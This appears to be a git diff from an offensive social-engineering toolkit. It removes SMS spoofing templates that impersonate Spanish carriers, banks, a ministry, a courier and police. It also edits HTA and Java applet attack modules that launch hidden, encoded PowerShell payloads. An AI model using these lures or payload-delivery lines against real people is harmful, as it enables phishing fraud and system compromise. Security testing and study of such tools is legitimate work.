@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="teabla"
SUBJECT="teabla: moviles gratis"
BODY="Rebajas exclusivas para ti en teabla: Llevate el Nokia 2680 por 13000 puntos y 0 euros.Solo hasta 15/02/10. Registrate en www.teabla.es 902203050"

9
src/templates/sms/27973430829013746123.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="7412"
SUBJECT="TMB: temps espera"
BODY="0488-Av de Madrid-Vallespir Linia Temps *54 5 min* Temps aproximat. TMB Gràcies"

9
src/templates/sms/34070789312210934380.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="221251"
SUBJECT="Movistar: publicidad ROCKRIO"
BODY="Movistar Publi:Vive ROCK&RIO al maximo con Movistar.Si eres de Telefonica o Movistar consigue tus entradas en movistar.es/rockinrio.SORTEAMOS 1.000. Hsta 19/04"

9
src/templates/sms/43234513006619301607.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="2255"
SUBJECT="Movistar: publicidad tarifa llamada"
BODY="Movistar info: Recuerda q la Tarifa Diaria q ya disfrutas te permite llamar en Europa por slo 0,28e/min+0,57 (estb llam)+1,16e cada dia q la utilices.+inf 609"

9
src/templates/sms/45723463533772650533.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="Movistar"
SUBJECT="Movistar: oferta otoño"
BODY="Publi:Hable en otoño 100 min y pague solo 1 hasta 9 nov cualquier destino nac(no incl establ)Alta 3,45e(iva incl)Y por 1,18 (iva incl)SMS al 50%.Alta en el 1200"

9
src/templates/sms/48842587427349852379.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="474"
SUBJECT="Yavoy: regalo yavoy"
BODY="Publi:GRATIS tu primer Yavoy! Llama al 474, elige Yavoy preferido y nosotros te lo regalamos!D.Bisbal,Guetta,Baute,5a estacion...p.llam:0.15+0.30e/min"

9
src/templates/sms/51366883259558865424.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="221252"
SUBJECT="Movistar: publicidad aramon"
BODY="movistar publi:Envia ARAMON al 7213 y consigue tu forfait ARAMONCLUB MOVISTAR con ventajas exclusivas y descuento hasta 20%.+info aramon.es"

9
src/templates/sms/5366255995038334754.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="7770"
SUBJECT="Tu Banco: visa disponible en oficina"
BODY="TARGETA VISA JA DISPONIBLE A OFICINA DE RIERA BLANCA/TU BANCO.0000 LA RIERA BLANCA"

9
src/templates/sms/61235614880419094815.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="M.vivienda"
SUBJECT="Ministerio vivienda: incidencia pago"
BODY="Ministerio de Vivienda. Tienes una incidencia en el pago de tu RBE. Motivo NO EXISTE VERIFICACION PAGO DEL ALQUILER info en www.alquilerjoven.es"

9
src/templates/sms/65225885161440001690.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="609"
SUBJECT="Movistar: publicidad navidad"
BODY="Movistar Info:Cada año, las personas para las que eres importante te felicitan la Navidad.En movistar nos sumamos a ellas deseandote Feliz Navidad y Feliz 2010."

9
src/templates/sms/71056159094763737298.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="86323663"
SUBJECT="Vodafone: publicidad nuevo contrato"
BODY="VF Info: El 1 de diciembre 2010 entra en vigor la nueva clausula 11 de las condiciones generales del contrato. Para informarte y oposicion consulta www.vodafone.es."

9
src/templates/sms/81470651031833477694.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="609"
SUBJECT="Movistar: publicidad nokia gratis"
BODY="Movistar publi:por ser cliente Movistar tiene a 0 Euros un Nokia X6 con alta Tarifa Plana Internet movil Premium.Ms info en 609.Max 30.000 canjes hasta 31/3."

9
src/templates/sms/89232956998478665492.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="2255"
SUBJECT="Movistar: publicidad tarifa sms"
BODY="Movistar publi: Con la Tarifa Diaria Europa los sms en Europa a 0,10e/sms y ahora las llamadas recibidas a 0e/min hasta el 12/4. ALTA Gratis llamando al 2255"

9
src/templates/sms/93752647864031571599.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="5039"
SUBJECT="MRW: pedido no entregado"
BODY="MRW INFORMA: SU ENVIO 01111/1111100 NO HA PODIDO SER ENTREGADO POR AUSENCIA DEL DESTINATARIO. ROGAMOS CONTACTE CON SU FRANQUICIA MRW EN EL TLF. 933255454"

9
src/templates/sms/98099561929676707961.template
View file

@ -1,9 +0,0 @@
# Author:
#
#
#
ORIGIN="762"
SUBJECT="ruralvia: confirmacion de transferencia"
BODY="El Sr/Sra DAVID FERNANDEZ VAZQUEZ le comunica que ha realizado una transferencia desde ruralvia a su favor por importe de 500,20 Euro"

6
src/templates/sms/fake_boss.template
View file

@ -1,6 +0,0 @@
# Author: smsgang.com
#
#
ORIGIN="8888"
SUBJECT="Boss Fake"
BODY="Hi Michael, please come to office earlier tomorrow.\n\nI will wait you at 7 there"

6
src/templates/sms/fake_police.template
View file

@ -1,6 +0,0 @@
# Author: smsgang.com
#
#
ORIGIN="8888"
SUBJECT="Police Fake"
BODY="Dear Mr.Jackson, You are invited to nearest police station for questioning.\n\nPolice Department."

6
src/templates/sms/fool_vodafone.template
View file

@ -1,6 +0,0 @@
# Author: smsgang.com
#
#
ORIGIN="8888"
SUBJECT="Vodafone Fool"
BODY="You have been charged 73 pounds for reading this SMS.\n\nThanks for using Vodafone."

2
src/webattack/hta/main.py
View file

@ -33,7 +33,7 @@ def gen_hta_cool_stuff():
"Generating powershell injection code and x86 downgrade attack...")
ps = generate_powershell_alphanumeric_payload(
selection, ipaddr, port, "x86")
command = ("powershell -window hidden -e " + ps)
command = (powershell_encodedcommand() + ps)
# hta code here
print_status("Embedding HTA attack vector and PowerShell injection...")
# grab cloned website

4
src/webattack/java_applet/Java.java
View file

@ -245,7 +245,7 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -EncodedCommand " + arrSplit[i]);
f = Runtime.getRuntime().exec("cmd /c powershell -ec " + arrSplit[i]);
}
}
}
@ -259,7 +259,7 @@ public class Java extends Applet {
String[] arrSplit = strMain.split(",");
for (int i=0; i<arrSplit.length; i++)
{
f = Runtime.getRuntime().exec("cmd /c powershell -enc " + arrSplit[i]);
f = Runtime.getRuntime().exec("cmd /c powershell -ec " + arrSplit[i]);
}
}
}